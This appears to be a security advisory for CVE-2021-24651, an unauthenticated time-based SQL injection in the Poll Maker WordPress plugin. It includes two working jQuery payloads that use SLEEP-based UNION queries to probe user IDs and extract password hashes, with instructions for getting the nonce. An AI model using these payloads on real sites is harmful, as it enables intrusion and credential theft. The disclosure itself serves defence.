Poll Maker < 3.4.2 – Unauthenticated Time Based SQL Injection | CVE 2021-24651

Description

The plugin allows unauthenticated users to perform SQL injection via the ays_finish_poll AJAX action. While the result is not disclosed in the response, it is possible to use a timing attack to exfiltrate data such as password hash.

Proof of Concept

This requires a valid nonce, which can be obtained by going to a page with a published poll and checking the value of ays_finish_poll hidden input.

PoC 1: If the user 1234 exists, this query takes around 10 seconds; if not, the query should be quick.

jQuery.post(poll_maker_ajax_public.ajax_url,{answer:["12345) UNION SELECT 1,1,1,0,1,NULL,0,1,1 FROM wp_users WHERE ID=1234 AND SLEEP(10) AND user_status IN (0"],ays_finish_poll:"NONCE",action:"ays_finish_poll",poll_id:"3",end_date:"2021-08-18+22:11:27"})

PoC 2: This uses builtin MariaDB functions to bypass magic quote. CHAR(36,80,36,66,37 USING utf8) is "$P$B%" (in a LIKE statement). If this query takes more than 10 seconds to execute, there's probably a user with ID 1 and password hash starting with "$P$B".

jQuery.post(poll_maker_ajax_public.ajax_url,{answer:["12345) UNION SELECT 1,1,1,0,1,NULL,0,1,1 FROM wp_users WHERE ID=1 AND user_pass LIKE CHAR(36,80,36,66,37 USING utf8) AND SLEEP(10) AND user_status IN (0"],ays_finish_poll:"NONCE",action:"ays_finish_poll",poll_id:"3",end_date:"2021-08-18+22:11:27"})